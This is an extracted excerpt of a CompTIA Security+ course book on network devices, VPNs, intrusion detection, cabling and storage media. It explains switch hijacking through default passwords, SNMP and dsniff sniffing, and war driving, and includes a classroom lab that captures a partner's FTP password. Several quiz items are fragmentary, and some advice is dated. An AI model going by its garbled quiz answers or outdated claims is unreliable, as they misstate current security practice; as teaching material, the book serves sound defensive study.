Exhibit 9-1: An example of a demilitarized zone (DMZ) Bastion hosts A bastion host is defined as a computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services. An effective bastion host is configured quite differently from a typical host. Some organizations have a bastion host that offers several services at once; other organizations prefer to have several bastion hosts with each fulfilling a specific role. In either event, all unnecessary programs, services, and protocols are removed and all unnecessary network ports are disabled. In addition, bastion hosts do not share authentication services with trusted hosts within the network. This is so that, if a bastion host is compromised, the hacker cannot gain any information beyond what resides on the bastion host. ACLs are modified on the file system and other system objects. All appropriate service packs, hot fixes, and patches should be installed on bastion hosts. Logging of all security-related events should also be enabled, and those logs should be reviewed on a regular basis to increase the chance of observing any inappropriate behavior.
Network devices
911
Honey pots or decoy computers specifically set up to attract and track potential hackers are not considered true bastion hosts, because they are not designed to offer legitimate services to the Internet, but rather are deliberately exposed to delay and sidetrack potential hackers and to facilitate tracking of any attempted break-ins. Application gateways Application gateways, also known as proxy servers, monitor specific applications such as FTP, HTTP, and Telnet, plus they allow packets accessing those services to go to only those computers that are allowed. Application gateways are a good backup to packet filters because a firewall that is set up to allow a specific service such as FTP can send the allowed packets to only one computer, the application gateway. As an example of how an application gateway works, consider a site that blocks all incoming FTP connections except those to a specific computer. The router allows FTP packets to go to only one computer, the FTP application gateway. A user who wishes to connect inbound to an FTP server would have to connect first to the application gateway, and then to the destination computer, as follows: 1 A user first connects to the application gateway and enters the name of an internal computer. 2 The gateway checks the users source IP address and accepts or rejects it according to the access control list. 3 The user might need to authenticate himself or herself with a username and password. 4 The proxy service creates an FTP connection between the gateway and the internal computer. 5 The gateway proxy service then passes bytes between the two connections. 6 The application gateway logs the connection. The security advantages inherent in application gateways also include: Information hiding The application gateway might be the only computer with a name known to the outside world, the actual servers hosting services such as FTP need never be disclosed. Robust authentication and logging All traffic can be made to pass through the application gateway, traffic can be authenticated before it reaches internal computers and can be logged. Simpler filtering rules The application gateway is the only computer that needs to be contacted by the filtering firewall or router, those systems need only allow application traffic destined for the gateway and discard the rest. The chief disadvantage of application gateways is that a single computer host assigned as the gateway must handle all incoming connections that, in a busy environment, could overwhelm the gateway. In addition, in the case of client-server protocols such as HTTP, two steps are required to connect inbound or outbound traffic, and this can increase processor overhead if there are many connections.
912
Exhibit 9-2: The OSI seven layer model The Physical layer (layer 1) deals with the electrical signals, the media access method (Ethernet, Token-Ring, etc.), and the actual hardware of networking, including cables, connectors, hubs and network cards. The Data Link layer (layer 2) deals with the MAC address. This is the layer where bridges and older switches function. The IP protocol works at the Network layer (layer 3), providing addressing and routing functions. The Transport layer (layer 4) is responsible for host-to-host communications. Its two protocols are TCP and UDP. The Session layer (layer 5) establishes, manages, and terminates connections. The Presentation layer (layer 6) translates the applications data format to the networks communication format. The Application layer (layer 7) defines how programs like FTP, HTTP, and Telnet exchange data.
Network devices
913
A function at each layer need only be able to communicate with the layers above and below it and be able to communicate with its peer level. Changes at one level should not affect the ability of the other layers to function. For instance, if a Token Ring network is migrated to an Ethernet system, only the cabling, hardware, and drivers that represent the Physical and Data-Link layers need be modified, but the IP network should still function, as well as all protocols and applications above it.
914
Do it!
2 A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services is called a ________ ________.
bastion host
It is a network segment between two routers. Its servers are publicly accessible. Its servers have lower security requirements than other internal servers. It commonly contains bastion, public Web, FTP, DNS, and RADIUS servers. All of the above.
6 Application gateways simplify filtering rules on routers; the router need only allow application traffic destined for the gateway, and can discard the rest. True or false?
True
7 Which of the following tasks can be performed by the proxy server? (Choose all that apply.)
A B
Checks its access control list to accept or reject the client request Authenticates the user Opens a connection between the user and the internal computer Logs the connection All of the above
C
E
915
Packet filters can be cumbersome to define Processor overhead grows and throughput decreases with complexity of the ACL Stateless routers cannot examine the content of a packet
916
Topic C: Switches
This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Switches
Exhibit 9-3: 3 Com SuperStack switch Just as they made moving information within an intranet more efficient, a new breed of switches is now operating at layer 3, the Network layer. Its now possible to combine the speed of hardware switching with the optimized path choosing of layer 3.
Switch security
Modern switches offer a variety of security features including ACLs and Virtual Local Area Networks (VLANs). The ACL-based packet filtering is similar to that mentioned previously, so this discussion concentrates on VLANs. From a security perspective, the major benefit of a switch over a hub is the separation of collision domains, limiting the possibility of easy sniffing.
Network devices Virtual local area networks The following is the Cisco definition of a virtual local area network (VLAN):
917
A VLAN is defined as a broadcast domain within a switched network. Broadcast domains describe the extent that a network propagates a broadcast frame generated by a station. Some switches might be configured to support a single or multiple VLANs. Whenever a switch supports multiple VLANs, broadcasts within one VLAN never appear in another VLAN. Switch ports configured as a member of one VLAN belong to a different broadcast domain, as compared to switch ports configured as members of a different VLAN. (Overview of Routing Between Virtual LANs, Cisco Systems.) VLANs increase security by clustering users in smaller groups, thereby making the job of the hacker harder. Rather than just gaining access to the network, a hacker must now gain access to a specific virtual LAN as well. In addition, by clustering users in a VLAN, the possibility of a broadcast storm is reduced. Security problems with switches Switches, even with VLANs enabled, are still susceptible to being compromised. Hackers can hijack a switch and reconfigure it to allow any traffic they wish through the system. Switch hijacking occurs when an unauthorized person is able to obtain administrator privileges of a switch and modify its configuration. Once a switch has been compromised, the hacker can do a variety of things, such as changing the administrator password on the switch, turning off ports to critical systems, reconfiguring VLANs to allow one or more systems to talk to systems they shouldnt, or they might configure the switch to bypass the firewall altogether. There are two common ways to obtain unauthorized access to a switch: trying default passwords, which might not have been changed, and sniffing the network to get the administrator password via SNMP or Telnet. Almost all switches built today come with multiple accounts with default passwords, and in some cases, no password at all. While most administrators know enough to change the administrator password for the telnet and serial console accounts, sometimes people dont know to change the SNMP strings that provide remote access to the switch. If the default SNMP strings are not changed or disabled, hackers might be able to obtain a great deal of information about the network or even gain total control of the switch. The Internet is full of sites that list the various switch types, their administrator accounts, SMTP connection strings, and passwords. If the default password(s) do not work, the switch can still be compromised if a hacker is sniffing the network while an administrator is logging on to the switch. Contrary to popular belief, its very possible to sniff the network when on some switches. This means that even if you change the administrator password(s) and the SNMP strings, you might still be vulnerable to switch hijacking. The easiest way to sniff a switched network is to use a software tool called dsniff, which tricks the switch into sending packets destined to other systems to the sniffer. Dsniff not only captures packets on switched networks, but also has the functionality to automatically decode passwords from insecure protocols such as Telnet, HTTP, and SNMP, which are commonly used to manage switches.
918
Securing a switch
Gaining access to a switch is the first step in gaining control of it, all management interfaces on switches should be isolated to reduce the chance of a successful attack. Many switches use Telnet or HTTPboth being open text protocolsfor management. It is recommended that any management of the switch be done by physical connection to a serial port or through secure shell (SSH) or another encrypted method if available. Separate switches or hubs should be used for DMZs to physically isolate them from the rest of your network and prevent VLAN jumping. Its important to put a switch behind a dedicated firewall device. Ensure that you maintain the switch, installing the latest version of the switch software and any security patches to protect yourself against exploits such as the land.c attack. Read the product documentation, paying special attention to administration accounts and default passwords. Always set strong passwords on the switch. Do it!
C-1:
Understanding switches
2 Modern switches can reduce broadcast traffic by forwarding packets based on the IP address. True or false?
True
3 A feature available in some switches that permit separating the switch into multiple broadcast domains is called ___________.
VLAN
Network devices
919
Exhibit 9-4: An IP-based PBX network A traditional PBX is a computer-based telephone switch that might be thought of as a small, in-house, telephone company. Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. As with traditional networks, the process of securing a PBX should be part of a written security policy. Determining who will be administering your PBX, who will be allowed what services, and what access to the PBX will be allowed, are all essential pieces of information.
920
CompTIA Security+ Certification Many PBX systems are remotely managed by the vendor who developed the system. If a PBX is remotely managed, that means intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware. It is recommended that, unless you are mandated to provide remote administration by the vendor, you remove this feature and administer the PBX from a console directly connected to the system. Additionally, many PBX systems are setup by default to allow handsets to be attached and detached at will by simply plugging a phone into the network and pressing a code on the keypad. This is done to ease maintenance, especially in those offices where hoteling or job sharing is common. Although this does ease the ability to move phones, it also opens a large security hole in the PBX system, because many of the move codes are standardized and posted on the Internet.
Modems
The increasing availability of digital cable and digital subscriber line (DSL) brought some new security issues with them. Although this section is too limited to cover them in depth, the discussion touches upon several of the more pressing issues. A typical cable modem can be seen in Exhibit 9-5.
Exhibit 9-5: EtherFast cable modem with USB and Ethernet Connection Model BEFCM U10 DSL versus cable modem security In the past, DSL had a security edge over cable systems. This came about because of the different methods by which the technologies connected their clients to the Internet. DSL lines provide a direct connection between the computer or network connected on the client side and the Internet. This direct connection is in contrast to the party line nature of cable systems. Cable modems are connected to a shared segment that, not unlike a corporate LAN, means that anyone else on that segment can potentially threaten your system unless proper precautions are taken. Although some cable customers encountered problems with the shared nature of the network in the past, most cable service providers now mitigate this problem by building security features into the cable modem hardware used to connect to their networks. In particular, basic network firewall capabilities now prevent customer files from being viewed or downloaded.
Network devices
921
Most cable modems today also implement the Data Over Cable Service Interface Specification (DOCSIS). DOCSIS includes support for cable network security features including authentication and packet filtering. Dynamic versus static IP addressing Another major security concern that used to plague both DSL and cable modem users was the issuing of static (permanent) IP addresses by the service providers. Now, most service providers use Dynamic Host Configuration Protocol (DHCP) to issue dynamic, random IP addresses to their clients. These are leased for a short period. Static addresses provide a fixed target for potential hackers, so the move to DHCP is definitely an improvement. Additional security can be provided by a firewall solution.
Wireless
Wireless devices, while providing greater flexibility, mobility, and overall convenience, and have their own vulnerabilities when it comes to security. While network connections utilize the same TCP/IP protocol that wired LANs use, the wireless nature of the technology means that almost anyone can eavesdrop on a network communication; even if your wireless access point is protected by your firewall, you are still susceptible to having your unencrypted transmissions overheard. In addition, without proper access control, anyone can connect to the network. The only secure method of communicating with wireless technology is limiting access through MAC address filtering and providing confidentiality with encryption. Mobile devices Mobile devices, specifically Personal Digital Assistants (PDAs), can open security holes for any computer with which these devices communicate. A gap that is not covered by antivirus software or firewalls occurs during the PDA to PC synchronization process. View McAfees Web site to get more information about wireless security at
http://www.mcafee.com/myapps/vsw/default.asp. An example of a pocket
922
Do it!
D-1:
2 Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. True or false?
True
3 Explain the vulnerability involved in allowing the vendor to remotely manage the PBX system.
If a PBX is remotely managed, an intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware.
4 Explain why allowing handsets to be attached and detached at will within a PBX system is considered risky.
Many of the move codes are standardized and posted on the Internet.
Changing the MAC address of the computer on a random basis Changing the IP address of the computer on a random basis Tracking all keystrokes entered on the computer
C D
Network devices
923
924
Exhibit 9-7: A typical VPN using Point of Presence (POP) When a virtual private network is implemented, the lowest levels of the TCP/IP protocol are implemented using an existing TCP/IP connection. The VPN hardware or software encrypts either the underlying data in a packet or the entire packet itself before wrapping it in another IP packet for delivery. Even if the packet is intercepted along the way, the content cannot be revealed to the hacker. Security is further enhanced by implementing Internet Protocol Security (IPSec). IPSec encryption IPSec was initially developed for Internet Protocol version 6 (IPv6), but many current IPv4 devices support it as well. It is the most commonly used encryption scheme for VPN tunnels. IPSec allows the encryption of either just the data in a packet or the packet as a whole including the address header information. These are called transport and tunnel, respectively. With IPSec in place, a VPN can virtually eliminate packet sniffing and identity spoofing. This is because only the sending and receiving computers hold the keys to encrypt and decrypt the packets being sent across the public network. The following steps show the process: 1 A remote user opens a VPN connection between his computer and his office network. The office network and the users computer (or their respective VPN gateways) execute a handshake and establish a secure connection by exchanging private keys. 2 The user then makes a request for a particular file.
Network devices
925
3 Assuming that the user has sufficient rights, the network begins to send the file to the user by first breaking the file into packets. If the VPN is using transport encryption, then the packets data is encrypted and the packets are sent on their way. If the system is using tunneling encryption, then each packet is encrypted and placed inside another IP envelope with a new address arranged for by the VPN gateways. 4 The packets are sent along the Internet until they are received at the users VPN device, where the encryption is removed and the file is rebuilt. If the VPN is using tunneling encryption, the peer VPN gateway forwards the unencrypted packets to the appropriate host on its LAN. Anyone sniffing the packets would have no idea of their content and might not even be able to determine the source and destination of the request. Do it!
E-1:
3 If the RAS is placed in the DMZ, remote users should be forced to authenticate through an internal firewall prior to gaining full network access. True or false?
True
4 Which encryption method is commonly used for VPN tunneling? (Choose all that apply.)
A B
C D
926
Host-based IDS
Explanation Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. IDS solutions are available from a variety of vendors including Computer Associates, Inc., Cisco Systems Inc., NFR Security, SecureWorks, and many others. Systems come in the form of software called computerbased IDS and dedicated hardware devices called network-based IDS. Host-based IDS are often used to secure critical network servers or other systems containing sensitive information. In a typical implementation, software applications known as agents are loaded on each protected computer. These agents make use of the disk space, RAM, and CPU time to analyze the operating system, applications, and system audit trails. The collected information is compared to a set of rules to determine if a security breach has occurred. These agents are tailored to detect computer-related activity and can track these types of events at an extremely fine level, even down to tracking which user accessed which file at what time. Host-based agents can be self-contained, sending alarm information to the screen attached to the computer upon which they are installed or they might be remotely managed by a central software package that receives periodic updates and security data. A computer-based solution that includes a centralized management platform makes it easier to upgrade the software; however, these types of solutions do not scale well across a large enterprise given the number of computers involved.
Network-based IDS
Network-based IDS monitor activity on a specific network segment. Unlike host-based agents, network-based systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. Implementations vary with some vendors selling separate sensor and management platforms and others selling self-contained sensor/management systems. An example of a Cisco IDS can be seen in Exhibit 9-8. The sensors in a network-based IDS capture network traffic in the monitored segment and perform rule-based or expert system analysis of the traffic using configured parameters. The sensors analyze packet headers to determine source and destination addresses in the same manner as a router. In addition, the sensors examine the type of data being transmitted and analyze the content of the packets flowing through them to determine if the packet is legitimate.
Network devices
927
If the sensor detects a packet that should not be in the system, it can perform a variety of tasks including sending an alarm to the management software or communicating with a router to have the router block all further packets from a particular address.
Anomaly-based detection
Anomaly-based detection involves building statistical profiles of user activity and then reacting to any activity that falls outside these profiles. A users profile can contain attributes such as time spent logged on to the network, location of network access, files and servers accessed, and so forth. One problem with anomaly-based detection is that users do not access their computers or the network in static, predictable ways; employees are transferred to other departments, or they go on the road or work from home, changing their point of entry into the network. Anomaly-based intrusion detection often leads to a large number of false positives.
Discuss how anomaly detection systems are much like some of todays terrorist investigators who have been monitoring a group or an area for quite some time and are looking for any changes in standard activity or behavior, which might indicate that something is amiss
Signature-based detection
Signature-based detection is very similar to an antivirus program in its method of detecting potential attacks. Its currently the more popular method of detection. Vendors produce a list of signatures that the IDS use to compare against activity on the network or host. When a match is found, the IDS take some action, such as logging the event or sending an alarm to a management console. Although many vendors allow users to configure existing signatures and create new ones, for the most part, customers depend on vendors to provide the latest signatures to keep the IDS up to date with the latest attacks. Signature-based detection can also produce false positives, as certain normal network activity can be construed as malicious. For example, some network applications or operating systems might send out numerous ICMP messages, which a signature-based detection system might interpret as an attempt by an attacker to map out a network segment.
928
Do it!
F-1:
Discussing IDS
Network devices
929
930
Do it!
G-1:
Heres how
Students should have a Windows Server 2003 installation CD-ROM available for this activity.
1 Boot to Server-X 2 Log on as Administrator 3 Click Start Choose Control Panel, Add
or Remove Programs To install Network Monitor.
4 Click Add/Remove
Windows Components
Make sure students don't check the check box.
Click Details 6 Check the Network Monitor Tools box Click OK 7 Click Next Insert the Windows Server 2003, Standard Edition CD Click OK 8 Click Finish 9 Close the Add or Remove Programs window 10 Open a Command window Type ipconfig/all Press e 11 Write down the MAC address of the network card that is connected to the classroom network
At the command prompt. (If prompted.) To configure Network Monitor to operate on the appropriate NIC.
931
13 Click OK 14 Expand Local Computer Select the appropriate NIC (the MAC address you wrote in Step 9)
The screen will resemble the one shown below.
932
933
G-2: Using Network Monitor to sniff an FTP session Heres how Heres why
Pair up with a partner for this activity. Each of your servers should have FTP services and Network Monitor installed.
Students should run this activity with a partner. Both servers should have the FTP server service and Network Monitor installed.
3 Expand Internet
Information Services
4 Expand FTP Sites 5 Ensure that the Default FTP Site is started 6 Click Start Choose Administrative Tools, Network Monitor 7 On the menu bar, choose Capture, Start 8 Open a Command window 9 Type ftp <your partners IP
address> You might also use the IP address of your own server. Start the Default FTP Site if it's stopped.
10 Enter Administrator for the user Enter password for the password 11 Once you are logged on, enter
quit
12 Switch back to the Network Monitor Choose Capture, Stop Click View
Information displayed will be similar to that shown in Exhibit 9-9.
934
Do it!
G-3:
2 Which of the following security features is available for the full version of Network Monitor?
A
Identify Network Monitor Users Intrusion detection system add-on Packet modification tools Password Sniffing tools
B C D
3 Network Monitor will allow you to view encrypted data in plain text. True or false?
False: Encrypted data is unreadable.
4 Which of the following protocols sends passwords and data in clear text? (Choose all that apply.) A B C D E F G
H
Telnet FTP HTTP NNTP IMAP POP SNMP All of the above
5 Network Monitor will capture all data sent to your NIC by default. What can be used to narrow the scope of the data collected? A B
C
Network devices 6 Network Monitor is considered a sniffer. Which of the following is a characteristic of a sniffer? A B C
D
935
7 A sniffer can be dangerous because it is very difficult to detect and can be attached to almost any part of a network. True or false?
True
936
Topic B
Topic C
Topic D
Topic E Topic F
Topic G
Review questions
1 What is a firewall?
A hardware or software barrier that isolates one network from another.
2 Answering the following questions provides you with what? What is being protected, from whom is it being protected, what services does the company need to access over the network, who gets access to which resources, and who administers the network.
You can draft a robust security policy, by answering those questions.
937
6 What is a router?
A network management device that sits between different network segments and routes traffic from one network to another.
Repeater Hub
12 Which Layer 2 device can limit the functionality of sniffing? A A bridge B A hub
C A switch
D A router 13 Why should you configure a switch using a physical connection to it?
If you use Telnet or HTTP protocols to access the switch remotely, these are both open text protocols that can be intercepted leading to compromising of the security of the switch configuration.
14 What feature is used for cable network security that provides authentication and packet filtering?
DOCSIS
938
CompTIA Security+ Certification 15 What steps can you take to make RAS connections more secure?
Use a bastion host running only RAS and protected by application gateway software or firewall software. To further enhance security, use the encryption and mandatory callback features offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server, they will still have to break through the firewall to get useful information
17 Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. True or False?
True
18 Host-based IDS systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. True or False?
False: This is a description of a network-based IDS.
2 Click on the ShieldsUp! link. You might have to scroll down to see the link. 3 On the resulting Shields Up! page, scroll down midway and click on the Proceed button. Click Yes. 4 Click on the File Sharing button. 5 Your computer system will be tested for file system security. If you have a printer available, print the results of the test noting any system vulnerabilities. 6 Scroll down the page and click on the Common Ports button. 7 Your computer system will be tested for security related to ports that are commonly used. If you have a printer available, print the results of the test noting any system vulnerabilities. 8 Repeat the process of checking your computer by clicking on the All Service Ports, Messenger Spam and Browser Headers buttons respectively after each previous test has completed. 9 When you've completed all tests, return to the GRC Web site at http://grc.com/default.htm and again click on the ShieldsUp! link. 10 Close all open windows.
101
102
Coaxial cable
Coaxial cable has a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield (see Exhibit 10-1). Coaxial cable tends to be more expensive than traditional telephone wiring, but is much less prone to interference. Vulnerabilities include cable breaks and malicious tapping. There are actually three types of coaxial cable used in networking: RG-8 RG-58 RG-59
103
RG-8, also referred to as 10Base5 or ThickNet, is the oldest form of coaxial cable. It uses baseband (single channel) signaling and 50-Ohm terminators. It is primarily used as a backbone in an Ethernet LAN environment and often connects one wiring closet to another. It can transmit data at speeds up to 10 Mbps, cover distances up to 500 meters, and can accommodate up to 100 nodes per segment. Up to five segments can be daisychained. Due to its rigidity, it is difficult to work with. RG-58 RG-58, also called 10Base2 or Thinnet (thin coaxial cable), uses baseband signaling and 50-Ohm terminators. It is the more popular form of coaxial cabling for Ethernet networks. Thinnet is capable of covering up to 185 meters and is not highly susceptible to noise interference. It transmits at 10 Mbps and can support up to 30 nodes per segment. Up to five segments can be daisy-chained. RG-59 RG-59 is the familiar coax cable used for cable TV and cable modems. It is rated 75 Ohms and offers broadband (multiple channels) transmission. RG-59 is able to transport both analog and high-speed digital signals, allowing for data, voice, and video capabilities. Note: It is important to know that 50-ohm and 75-ohm cabling are not interchangeable.
104
CompTIA Security+ Certification The difference between UTP and shielded twisted pair (STP) is an extra foil shield that is wrapped between the copper pairs to provide additional protection from EMI (Exhibit 10-3).
Exhibit 10-3: Shielded twisted pair cable Twisted pair is further classified into different categories based on the data transmission rates it can sustain. The most common types of cables are Category 3 (CAT 3), Category 5 (CAT 5), and most recently Category 6 (CAT 6). CAT 3 is the minimum requirement for 10Mbps Ethernet and voice systems. CAT 5 is required to support Fast Ethernet (100Mbps) and uses an 8-pin configuration that can be modified for use as a crossover cable, a straightthrough cable, or a customized cable. CAT 5E is a higher grade CAT5 cable. CAT 6 is a newer technology that is capable of supporting Gigabit Ethernet (1000 Mbps) and is backwards compatible and also uses an 8-pin configuration. Twisted pair connects to hardware using an RJ-45 connector, which looks very similar to a phone jack, but is a bit larger (Exhibit 10-4).
Exhibit 10-4: RJ-45 connector Note: It is important to know that twisted pair is very easily spliced, which allows unauthorized users access to the network. A discussion of these types of problems follows later in the unit.
105
Fiber-optic cable
Fiber-optic cable is the newest form of cable available. It comprises a glass core that is encased by a plastic outer covering. It is also much smaller, lighter, more fragile, and susceptible to damage than coaxial cable or twisted pair (Exhibit 10-5).
Exhibit 10-5: Fiber-optic cable Instead of an electrical current (like coaxial and twisted pair), fiber-optic cable carries light. It is capable of transmitting more data much further than other wiring types and is immune to the effects of EMI. Perhaps the biggest benefit of using fiber-optic cable is that it is nearly impossible to splice without detection. In order to effectively split a fiber-optic signal, the core must be disrupted, thus allowing for ease of detection by a network administrator. The biggest disadvantages to fiber are its cost and its difficulty to install and manipulate. The table below provides a comparison of the three types of wired transmission media just discussed.
Media Coaxial cable Advantages High bandwidth, long distances, relative EMI immunity Disadvantages Physical dimensions (can be bulky and difficult to work with), easily tapped, single cable break brings the network down Most sensitive to EMI, supports short distances, easily tapped
Inexpensive, widely used, easy to add nodes, single cable break wont bring the network down Very high bandwidth, EMI immunity, long distances
Fiber-optic cable
Wireless
Unguided transmissions of data use various technologies including microwave, radio, and infrared to receive and transmit over airwaves. Wireless was previously discussed at length, yet it is important to realize that it too is a form of transmission media and should be considered when thinking about implementing and securing networks. Much like coaxial cable and twisted pair copper cable, unguided transmission methods are vulnerable to security breaches in which unauthorized users intercept data flows. The most important distinction is that because unguided connections cannot easily be physically contained like the media, it is much more difficult to secure.
106
Do it!
A-1:
2 A(n) __________ is a standardized connector used to connect twisted pair copper cable to a piece of networking equipment. A
B
C D E
107
7 Twisted-pair cable is the most widely known by the general public because it is the primary type of cabling used for cable television. True or false?
False. Coaxial cable is used for cable television.
8 CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems. True or false?
True
108
109
It is extremely difficult to ensure the security of physical cabling. Both coaxial cable and twisted pair are easily spliced. The most vulnerable places for gaining unauthorized access to cabling are between buildings or floors. Sometimes, the distance between the points is large enough to require fiber-optic cable, which gives the added benefit of more security. However, the majority of interfloor connections still use some form of copper wire, which makes the physical security of that connection all the more important. Electromagnetic emissions Despite all of the physical security that can be implemented, it is still possible for attackers to eavesdrop on data flows by listening for electromagnetic emissions from workstations and other nodes. There are several ways to protect against this. If possible, purchase and use equipment that is designed to limit or eliminate the signal leaks. This can be very expensive. Fiber-optic cable is especially good at eliminating this type of risk. Another way to stop eavesdropping through electromagnetic emission is to encrypt the data flows using various different encryption technologies. This way, even if an attacker has access to the flows, the data is useless without a key to decrypt the data. Power interruptions In many situations, LAN and wiring closets tend to share spaces with power sources and other utilities. This exposes the network to a failure risk even without a threat of an attacker. Should there be a fire, the network can be showered with water or other fire retardants. Several dry methods for fire extinguishing can be used and should be investigated when securing a network. Many LANs are also completely reliant on a power supplier for all the power to the network. Deploying an uninterruptible power supply (UPS) can mitigate this risk by providing temporary power during a brief outage. Interruption of services Another way to secure the infrastructure is to implement a redundant network (having multiple devices in the same function). In this instance, if a network device becomes compromised, it does not necessarily mean that the entire network is compromised. A backup device can be available to take over the duties of the disabled piece of equipment. War driving The media has covered many cases of war driving. Literally, war driving is using a laptops wireless network interface card set in promiscuous mode to pick up unsecured wireless signals. Today, hackers are war driving, or LAN-jacking, wireless networks for anonymous and free high-speed Internet access or purely for access to a network. War driving requires no elaborate software or hardware. An ordinary wireless NIC set in promiscuous mode easily latches on to open wireless network beacons. Using a global positioning satellite (GPS) receiver in conjunction with wireless network interface cards, hackers are mapping major metropolitan areas and compiling a list of wireless networks, both secured and unsecured. One of the best ways to defend against such attacks is to use a VPN or other encryption technology when using wireless LANs.
A-2:
C D
2 What is the most likely area for an intruder to try to gain access to physical network media?
A non-secure area, such as the space between floors where coaxial or twisted pair media may be connecting separate floors in an office building.
3 What are some of the ways you can minimize eavesdropping of electromagnetic emissions?
Use fiber optic cable and/or encrypt data.
1011
Exhibit 10-6: Various storage media Floppy disks The first floppy disks were not rigid or encased in hard plastic as they are today. The size of the floppy has changed several timesthe original floppy disk measured 8 inches across. A 5.25-inch disk was then developed, and finally the 3.5-inch disk that is now commonly used. Other types of floppy disks also exist, but the most common is the 3.5-inch, high density, which holds about 1.44 MB of data. The 3.5-inch floppy disk has a circular magnetic piece of plastic, which is placed inside a rigid plastic case for protection. To help avoid data loss, carrying disks in a waterproof case helps prevent water or dust from damaging the disk. Keep floppy disks away from anything that might hold a magnetic or electrical field, such as a mobile phone, radio, metal tools or paper clips that have been stored in a magnetic paper clip holder. Because floppy disks are made of magnetic material, any other magnetic material can erase or damage data on the floppy disk. Store floppy disks in an area with a temperature between 32 and 140 F. Although the floppy disk was once the primary type of magnetic removable media, it is quickly being replaced by larger-capacity magnetic disks. Cartridge disks Cartridge drives were popular in the 1990s. They gave users more capacity than the 1.44 MB floppy disks had. Users were comfortable with removable disk storagethey had been using the floppy disks. Removable disk storage has changed a lot over the years from the basic floppy disk to the Bernoulli box to the REV drive. Popularity of cartridge drives has declined with the rise in availability of CD and DVD recordable media and drives.
1013
The Iomega Company has created many of the cartridge drives and related media. The first of these was the Bernoulli Box. It was originally offered with 5, 10, and 20 MB disk choices. Over the years they increased the disk capacity up to 230 MB. The disks were Mylar disks (like in a floppy disk), in approximately 5.25 inch sturdy cartridge cases. Zip drives Another popular solution was the Iomega Zip drive. This was slightly larger than a 3.5 floppy disk. The original capacity was 100 MB. Later versions were 250 and 750 MB. The 750 MB drive could read 100 MB cartridges, but not write to them. The 250 MB drive could read and write to 100 MB cartridges, but at a slower speed than to 250 MB cartridges. It was available with parallel, SCSI, and USB interface options. Zip disks are prone to getting dirty and the drives were prone to heads becoming misaligned. This caused problems reading the disks. The head arm would be rapidly snapped into the drive and out again, creating a click. This became known as the click of death. It often tore the edge of the disk and sometimes damaged the head as well. Damaged disks could also damage other drives if the disk was tried in another drive.
Exhibit 10-7: Zip drive and cartridge Jaz drives Another storage solution Iomega introduced was the Jaz drive. It had 1 GB and 2 GB cartridges that used Winchester hard drive technology. They were available in SCSI and USB interface models. REV drives The current Iomega offering is the 35 GB REV drive. The read/write heads and controller are contained in the drive. They can be connected via USB, SCSI, FireWire, and ATAPI interfaces.
Exhibit 10-8: Compact disc A CD is a plastic disc covered by a layer of aluminum and a layer of acrylic. Data is recorded onto a CD by creating very small bumps in the aluminum layer on long tiny tracks. The data is then read by a laser beam. As the laser hits the bumps in the tracks, an optical reader called an optoelectronic sensor detects the changing pattern of reflected light from the bumps in the aluminum coating. This pattern is then translated into bits and sent to the computer. Although many CDs are produced professionally, it is now possible to make a CD with a personal computer. CD writers, or burners, record the data onto the aluminum coating, creating the bumps that are read by the CD drive. A typical CD can store 700 MB of data, which is approximately the same as 486 standard floppy disks. This means a CD can store over three million pages of text or 20,000 graphic images. CDs are commonly used to store multimedia, such as music or video, which need large amounts of storage space. The most common forms of CDs are those that hold recorded music.
1015
The most common type of CD used with computers is the CD-ROM. Material can be written or recorded to the disc only once, usually by a professional CD-ROM producing company. CD-ROMs hold prerecorded materials to be used on a computer, such as software, graphic images, short video clips, or audio. When you purchase a new piece of software, it normally comes on a CD-ROM and is installed using the CD-ROM drive. CD-Rs Compact disc-recordable (CD-R) is another type of CD. It is similar to audio CDs and CD-ROMs. However, unlike a CD or a CD-ROM, which is purchased prerecorded, a CD-R is a blank CD. Data is recorded onto the CD-R by using a CD-R drive. CD-Rs are perfect for storing large amounts of data. Like other types of CDs, CD-Rs hold about 700 megabytes of data. They can be used to store older documents or files that you want to save but do not need to access daily. Many people use CD-Rs to distribute files to others and to backup files. Although CD-R discs appear to be identical to other types of CDs, instead of having an aluminum layer on which the data has been prerecorded using bumps, a CD-R has a layer of light-sensitive dye on top of a layer of reflective gold. Using the CD-R drive, the data is burned or recorded on the disc with a high-powered laser beam. Instead of creating bumps in the aluminum layer like a prerecorded CD, the laser changes the color of the light-sensitive dye by pulsing in patterns. CD-Rs can have data recorded onto it only one time. Hence, it is called a write once, read many (WORM) type of media. The next step in CD technology is the compact disc-rewriteable (CD-RW). A CD-RW disk is very similar to a CD-R disk, except that it can be recorded onto more than once. The layer of dye is different and can be rewritten multiple times, so you can write, delete, and rewrite to the same CD. The CD-RW drive is similar to the CD-R drives, with the additional abilities to record or write over data on the same disc. Both the CD-RW discs and CD-RW drives are more expensive to purchase than CD-R discs and drives. DVDs The DVD is becoming a popular type of permanent optical storage. Primarily used to store full-length feature films, the DVD is similar to a CD, but with a much larger data capacity. A DVD holds about seven times as much data as a regular CD. Like CDs, DVDs are also made out of plastic with a layer of gold, covered by a thin layer of clear polymer. The difference is that the tracks on a DVD are much thinner and placed closer to each other, so many more tracks fit on a disc, allowing more space for recorded data. In addition, DVDs can be recorded on both sides, doubling the amount of storage space available.
